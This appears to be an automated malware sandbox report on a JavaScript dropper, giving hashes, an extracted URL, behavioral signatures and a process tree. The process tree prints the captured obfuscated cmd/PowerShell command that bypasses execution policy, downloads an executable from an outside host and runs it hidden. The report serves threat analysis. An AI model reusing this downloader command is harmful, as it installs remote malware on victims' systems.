Analysis
-
max time kernel
17s -
max time network
110s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
18-01-2021 21:43
Static task
static1
Behavioral task
behavioral1
Sample
4IW7erkj68.js
Resource
win7v20201028
Behavioral task
behavioral2
Sample
4IW7erkj68.js
Resource
win10v20201028
General
-
Target
4IW7erkj68.js
-
Size
21KB
-
MD5
ffff42a84871648a25ba2c39beca8d83
-
SHA1
31acbb969b4b9d167f5ad4c78510ba2e8e0b4610
-
SHA256
c03c5f7dabff34048550ffe1290d714291c554cdffa85da7116c3b675aadb458
-
SHA512
b770666259807832786ee526c51ba18b59f80ba58a30d1ef892360bc88d71627674d341dea31f56221e821d072a67d1c62e82b3fd9b26338167046e3bcfdfe41
Malware Config
Extracted
http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php
Signatures
-
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 8 3708 powershell.exe -
Suspicious behavior: EnumeratesProcesses 3 IoCs
Processes:
powershell.exepid process 3708 powershell.exe 3708 powershell.exe 3708 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
Processes:
powershell.exedescription pid process Token: SeDebugPrivilege 3708 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
wscript.execmd.exedescription pid process target process PID 812 wrote to memory of 2788 812 wscript.exe cmd.exe PID 812 wrote to memory of 2788 812 wscript.exe cmd.exe PID 2788 wrote to memory of 3708 2788 cmd.exe powershell.exe PID 2788 wrote to memory of 3708 2788 cmd.exe powershell.exe
Processes
-
C:\Windows\system32\wscript.exewscript.exe C:\Users\Admin\AppData\Local\Temp\4IW7erkj68.js1⤵
- Suspicious use of WriteProcessMemory
PID:812 -
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','%temp%VKF54.exe'); & %temp%VKF54.exe & BTHpwAoayRPbclY2⤵
- Suspicious use of WriteProcessMemory
PID:2788 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://ixd1196.firebird.sheridanc.on.ca/cookies/custom.php','C:\Users\Admin\AppData\Local\TempVKF54.exe');3⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3708
Network
MITRE ATT&CK Matrix
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\TempVKF54.exeMD5
2f5cded6abfe8576ea9ce3c91916efb3
SHA12e45ab8e29f1a10b9261df8f1567b26cfd24284c
SHA2562883ba11d3ee1b2412ff15ad8378143ec66a9d6f9afeafafc7747c00f9530e15
SHA512de54882d2fc436991c0a3ce01d23df979f627d3e6feb6099fea27c28959c9e55d0798b9a0f520f13873f5ecb172fb45c99ce20f07b2bc1b692a108b10fbfeb98
-
memory/2788-2-0x0000000000000000-mapping.dmp
-
memory/3708-3-0x0000000000000000-mapping.dmp
-
memory/3708-4-0x00007FFB852D0000-0x00007FFB85CBC000-memory.dmpFilesize
9.9MB
-
memory/3708-5-0x0000014C9E5E0000-0x0000014C9E5E1000-memory.dmpFilesize
4KB
-
memory/3708-6-0x0000014C9E3F0000-0x0000014C9E3F2000-memory.dmpFilesize
8KB
-
memory/3708-7-0x0000014C9E3F3000-0x0000014C9E3F5000-memory.dmpFilesize
8KB
-
memory/3708-8-0x0000014CB8BB0000-0x0000014CB8BB1000-memory.dmpFilesize
4KB
-
memory/3708-9-0x0000014C9E3F6000-0x0000014C9E3F8000-memory.dmpFilesize
8KB